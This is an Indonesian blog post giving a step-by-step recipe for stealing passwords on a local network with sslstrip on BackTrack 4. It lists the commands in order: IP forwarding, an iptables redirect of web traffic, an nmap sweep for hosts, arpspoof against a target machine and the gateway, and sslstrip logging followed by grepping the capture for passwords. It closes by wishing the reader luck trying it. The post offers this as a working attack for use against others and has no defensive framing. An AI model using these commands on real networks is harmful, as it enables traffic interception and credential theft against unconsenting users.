Subscribe
Add to Technorati Favourites
Add to del.icio.us
Senin, 19 Desember 2011

SSLTRIP HACKING PASSWORD WITH BACKTRACK4

Diposting oleh Unknown

Topologi ssltrip


1. Echo 1 > /proc/sys/net/ipv4/ip_forward

akan merubah komputer hacker manjadi gateway, dengan meneruskan paket yang datang (forward) seakan-akan dialah gerbang menuju internet.
2. Iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000

setiap paket yang datang menuju http (port 80) akan dibelokkan ke port 10000 (ssltrip)
3. nmap -sP 192.168.55.0/24(ip public tempat kita melakukan hacking)
melihat semua ip yang connect ke jaringan
4. Arpspoof -i eth0 -t 192.168.55.106 192.168.55.1

ARP akan di broadcast ke seluruh jaringan termasuk ke komputer target dan gateway agar semua paket yang menuju internet akan tertipu. Penipuan ini akan mengakibatkan semua paket jaringan disadap oleh komputer hacker.
5. Sslstrip -a -w hasilsadap

perintah diatas akan menyimpan seluruh paket berupa karakter ke file hasilsadap.

Gunakan teknik pengolahan kata (sampah hasil sadapan) ke file hasilsadapan

ex: cat hasilsadap | grep -i “passwd”

6. SELAMAT MENCOBA